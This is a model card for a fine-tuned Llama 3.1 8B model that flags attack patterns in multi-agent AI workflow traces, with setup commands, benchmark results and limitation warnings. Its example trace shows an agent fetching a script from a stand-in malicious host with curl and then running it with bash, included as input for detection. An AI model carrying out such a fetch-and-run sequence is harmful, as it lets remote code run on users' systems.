Instructions to use guerilla7/agentic-safety-gguf with libraries, inference providers, notebooks, and local apps. Follow these links to get started.
- Libraries
- llama-cpp-python
How to use guerilla7/agentic-safety-gguf with llama-cpp-python:
```python
# !pip install llama-cpp-python
from llama_cpp import Llama

llm = Llama.from_pretrained(
    repo_id="guerilla7/agentic-safety-gguf",
    filename="agentic-safety-v4-q4_k_m.gguf",
)

# The model card defines no canonical input example; this prompt is illustrative.
response = llm.create_chat_completion(
    messages=[
        {"role": "user", "content": "What is indirect prompt injection in multi-agent systems?"}
    ]
)
print(response["choices"][0]["message"]["content"])
```
- Notebooks
- Google Colab
- Kaggle
- Local Apps
- llama.cpp
How to use guerilla7/agentic-safety-gguf with llama.cpp:
Install from brew
```shell
brew install llama.cpp

# Start a local OpenAI-compatible server with a web UI:
llama-server -hf guerilla7/agentic-safety-gguf:Q4_K_M

# Run inference directly in the terminal:
llama-cli -hf guerilla7/agentic-safety-gguf:Q4_K_M
```
Install from WinGet (Windows)
```shell
winget install llama.cpp

# Start a local OpenAI-compatible server with a web UI:
llama-server -hf guerilla7/agentic-safety-gguf:Q4_K_M

# Run inference directly in the terminal:
llama-cli -hf guerilla7/agentic-safety-gguf:Q4_K_M
```
Use pre-built binary
```shell
# Download a pre-built binary from:
# https://github.com/ggerganov/llama.cpp/releases

# Start a local OpenAI-compatible server with a web UI:
./llama-server -hf guerilla7/agentic-safety-gguf:Q4_K_M

# Run inference directly in the terminal:
./llama-cli -hf guerilla7/agentic-safety-gguf:Q4_K_M
```
Build from source code
```shell
git clone https://github.com/ggerganov/llama.cpp.git
cd llama.cpp
cmake -B build
cmake --build build -j --target llama-server llama-cli

# Start a local OpenAI-compatible server with a web UI:
./build/bin/llama-server -hf guerilla7/agentic-safety-gguf:Q4_K_M

# Run inference directly in the terminal:
./build/bin/llama-cli -hf guerilla7/agentic-safety-gguf:Q4_K_M
```
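Whichever install path you choose, `llama-server` listens on port 8080 by default and speaks the OpenAI chat-completions protocol. A minimal request might look like the following sketch; the prompt is illustrative and the command assumes a server is already running locally:

```shell
# JSON payload for llama-server's OpenAI-compatible chat endpoint.
PAYLOAD='{"messages": [{"role": "user", "content": "What is indirect prompt injection?"}]}'

# Send it to the local server (default port 8080); ignore the failure
# if no server is running yet.
curl -s http://localhost:8080/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d "$PAYLOAD" || true
```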
Use Docker
```shell
docker model run hf.co/guerilla7/agentic-safety-gguf:Q4_K_M
```
- LM Studio
- Jan
- Ollama
How to use guerilla7/agentic-safety-gguf with Ollama:
```shell
ollama run hf.co/guerilla7/agentic-safety-gguf:Q4_K_M
```
- Unsloth Studio
How to use guerilla7/agentic-safety-gguf with Unsloth Studio:
Install Unsloth Studio (macOS, Linux, WSL)
```shell
curl -fsSL https://unsloth.ai/install.sh | sh

# Run Unsloth Studio
unsloth studio -H 0.0.0.0 -p 8888

# Then open http://localhost:8888 in your browser
# Search for guerilla7/agentic-safety-gguf to start chatting
```
Install Unsloth Studio (Windows)
```powershell
irm https://unsloth.ai/install.ps1 | iex

# Run Unsloth Studio
unsloth studio -H 0.0.0.0 -p 8888

# Then open http://localhost:8888 in your browser
# Search for guerilla7/agentic-safety-gguf to start chatting
```
Using HuggingFace Spaces for Unsloth
```shell
# No setup required
# Open https://huggingface.co/spaces/unsloth/studio in your browser
# Search for guerilla7/agentic-safety-gguf to start chatting
```
- Docker Model Runner
How to use guerilla7/agentic-safety-gguf with Docker Model Runner:
```shell
docker model run hf.co/guerilla7/agentic-safety-gguf:Q4_K_M
```
- Lemonade
How to use guerilla7/agentic-safety-gguf with Lemonade:
Pull the model
```shell
# Download Lemonade from https://lemonade-server.ai/
lemonade pull guerilla7/agentic-safety-gguf:Q4_K_M
```
Run and chat with the model
```shell
lemonade run user.agentic-safety-gguf-Q4_K_M
```
List all available models
```shell
lemonade list
```
agentic-safety-gguf
Research Paper: https://arxiv.org/abs/2601.00848
Specialized security model for detecting temporal attack patterns in multi-agent AI workflows.
Fine-tuned from Foundation-Sec-8B-Instruct (Llama 3.1 8B) on 80,851 curated examples plus 141 targeted augmentation examples, achieving 74.29% accuracy on custom cybersecurity benchmarks, a +31.43-point improvement over the base model (p < 0.001).
🎯 Key Capabilities
✅ Temporal Attack Pattern Detection: Identifies malicious sequences across multi-step agent workflows
✅ OpenTelemetry Trace Analysis: Classifies workflow traces for OWASP Top 10 Agentic vulnerabilities
✅ Security Knowledge Q&A: Answers technical questions about agentic AI security, LLM threats, MITRE ATT&CK
✅ Multi-Agent Security: Detects coordination attacks in distributed agent systems
⚠️ Critical Production Warning
NOT production-ready for automated security decisions:
- False Positive Rate: 66.7% on benign workflow traces
- Trace Accuracy: 30% overall (60% TPR, 0% TNR)
- Root Cause: Training data heavily skewed toward attacks (90% malicious)
- Deployment: Human-in-the-loop oversight mandatory - suitable for monitoring/alerting only, not automated blocking
See research paper for detailed analysis and proposed V5 improvements.
📊 Performance Summary
| Benchmark | Base Model | agentic-safety-gguf | Improvement |
|---|---|---|---|
| Custom MCQA Overall | 42.86% | 74.29% | +31.43 pts |
| Agentic AI Security | 40.0% | 70.0% | +30.0 pts |
| Traditional Security | 44.0% | 76.0% | +32.0 pts |
| MMLU Computer Security | - | 74.0% | - |
| MMLU Security Studies | - | 72.24% | - |
Statistical Validation: McNemar's χ² = 18.05, p < 0.001, Cohen's h = 0.65 (large effect)
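For reference, Cohen's h compares the two accuracies via an arcsine transform, and McNemar's test operates only on the discordant pairs (questions one model answered correctly and the other did not). A quick sketch, where the discordant counts `b` and `c` are purely hypothetical because the paper's contingency table is not reproduced here:

```python
import math

def cohens_h(p1: float, p2: float) -> float:
    """Effect size for two proportions: h = 2*asin(sqrt(p1)) - 2*asin(sqrt(p2))."""
    return 2 * math.asin(math.sqrt(p1)) - 2 * math.asin(math.sqrt(p2))

def mcnemar_chi2(b: int, c: int) -> float:
    """McNemar's chi-square (without continuity correction) from discordant counts."""
    return (b - c) ** 2 / (b + c)

# Reported accuracies: 74.29% fine-tuned vs 42.86% base
print(round(cohens_h(0.7429, 0.4286), 2))  # 0.65, matching the reported "large effect"

# Hypothetical discordant counts, for illustration only
print(round(mcnemar_chi2(25, 3), 2))  # 17.29
```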
Iterative Training: V2 baseline (80,851 ex) → V3 (+111 OWASP) → V4 (+30 adversarial) demonstrated targeted augmentation effectiveness.
🚀 Quick Start
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch

# Load model
model_name = "guerilla7/agentic-safety-gguf"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(
    model_name,
    torch_dtype=torch.bfloat16,
    device_map="auto"
)

# Security Q&A
messages = [
    {"role": "system", "content": "You are a cybersecurity expert specialized in agentic workflow security."},
    {"role": "user", "content": "What is indirect prompt injection in multi-agent systems?"}
]
inputs = tokenizer.apply_chat_template(
    messages, add_generation_prompt=True, return_tensors="pt"
).to(model.device)
outputs = model.generate(inputs, max_new_tokens=512, temperature=0.7, do_sample=True)
response = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(response)
```
Analyzing Workflow Traces
```python
import json

trace = {
    "spans": [
        {"name": "user_request", "attributes": {"action": "fetch_emails"}},
        {"name": "tool_call", "attributes": {"tool": "curl", "url": "https://malicious.com/script.sh"}},
        {"name": "tool_call", "attributes": {"tool": "bash", "command": "script.sh"}}
    ]
}

prompt = f"""Analyze this trace for security threats:
{json.dumps(trace, indent=2)}

Classify as BENIGN, SUSPICIOUS, or MALICIOUS."""

# Use the model as in Quick Start with this prompt
```
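The same pattern can be wrapped in small helpers. Everything below (the span schema, the verdict keywords, the parsing heuristic) is an illustrative sketch, not an interface defined by the model card:

```python
import json

VERDICTS = ("BENIGN", "SUSPICIOUS", "MALICIOUS")

def build_trace_prompt(trace: dict) -> str:
    """Format an OpenTelemetry-style trace into the classification prompt."""
    return (
        "Analyze this trace for security threats:\n"
        f"{json.dumps(trace, indent=2)}\n"
        "Classify as BENIGN, SUSPICIOUS, or MALICIOUS."
    )

def parse_verdict(model_output: str) -> str:
    """Take the verdict keyword that appears earliest in the model's reply.

    Given the model's 66.7% false-positive rate, an ambiguous reply is
    routed to human review as SUSPICIOUS rather than trusted as BENIGN.
    """
    upper = model_output.upper()
    hits = [(upper.find(v), v) for v in VERDICTS if v in upper]
    return min(hits)[1] if hits else "SUSPICIOUS"
```

A reply such as "Verdict: MALICIOUS, curl piped to bash" parses to MALICIOUS; a reply with no keyword falls back to SUSPICIOUS for human review.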
⚠️ Warning: 66.7% FPR requires human review before taking action.
📖 Use Cases
✅ Recommended
- Security research on agentic AI vulnerabilities
- Educational demonstrations (OWASP Top 10)
- Prototype development for security tools
- Knowledge assistance (74% MCQA accuracy)
❌ Not Recommended
- Production security monitoring without human oversight
- Automated security decisions (30% trace accuracy insufficient)
- Mission-critical applications
- Regulatory compliance automation
🎓 Training Details
Dataset: 80,851 curated examples from 18 cybersecurity sources + 35,026 synthetic OpenTelemetry traces, augmented with 111 OWASP-focused + 30 adversarial examples via continuation training
Complete dataset: guerilla7/agentic-safety-gguf
Method: QLoRA (4-bit NF4, rank 16, alpha 16)
Hardware: NVIDIA DGX Spark (ARM64, 128GB)
Training: V2 (1,500 steps, 6h 43m) → V3 (+500 steps) → V4 (+500 steps)
Loss: 3.68 → 0.52 (85.99% reduction)
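As a sanity check on the adapter size, the rank-16 LoRA footprint can be estimated from Llama 3.1 8B's published dimensions (hidden 4096, grouped-query key/value width 1024, MLP width 14336, 32 layers). The assumption that adapters were attached to every linear projection is mine; the card does not state the target modules:

```python
# Estimate trainable LoRA parameters for rank-16 adapters on every
# linear projection of a Llama 3.1 8B-style transformer.
HIDDEN, KV, MLP, LAYERS, RANK = 4096, 1024, 14336, 32, 16

def lora_params(d_in: int, d_out: int, r: int = RANK) -> int:
    """A LoRA adapter on a d_in x d_out layer adds r*(d_in + d_out) weights."""
    return r * (d_in + d_out)

per_layer = (
    lora_params(HIDDEN, HIDDEN)      # q_proj
    + lora_params(HIDDEN, KV)        # k_proj (grouped-query attention)
    + lora_params(HIDDEN, KV)        # v_proj
    + lora_params(HIDDEN, HIDDEN)    # o_proj
    + lora_params(HIDDEN, MLP)       # gate_proj
    + lora_params(HIDDEN, MLP)       # up_proj
    + lora_params(MLP, HIDDEN)       # down_proj
)
total = per_layer * LAYERS
print(f"{total:,} trainable parameters")  # 41,943,040 (~0.5% of the 8B base)
```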
See research paper for the complete methodology, ablation studies, and statistical analysis.
📚 Resources
- Dataset Repository: datasets/guerilla7/agentic-safety-gguf
- Research Paper: https://arxiv.org/abs/2601.00848
- Training Scripts: Complete QLoRA implementation, evaluation code, GGUF quantization utilities
📄 Citation
```bibtex
@article{agentic-safety-gguf-2025,
  title={agentic-safety-gguf: Specialized Fine-Tuning for Agentic AI Security},
  year={2025},
  url={https://huggingface.co/guerilla7/agentic-safety-gguf}
}
```
⚖️ Limitations
- High False Positive Rate (66.7%): Unsuitable for production without human oversight
- Small Evaluation Sample: 30 trace evaluation (±18% confidence intervals)
- Synthetic Data Bias: 43% synthetic training data
- ARM64-Specific: Training validated on DGX Spark only
- No Commercial Comparison: Not benchmarked against GPT-4/Claude
Proposed V5 Solution: Balanced dataset (80K benign + 80K malicious) targeting 30-50% FPR, 75-85% TPR. See paper for detailed roadmap.
📅 Updates
- 2025-12-29: Initial release with V2/V3/V4 training artifacts and research paper
License
Apache 2.0
- Downloads last month: 87
- Quantization: 4-bit
- Base model: meta-llama/Llama-3.1-8B
- Evaluation results (self-reported):
  - Overall Accuracy: 74.29
  - Agentic AI Security: 70.00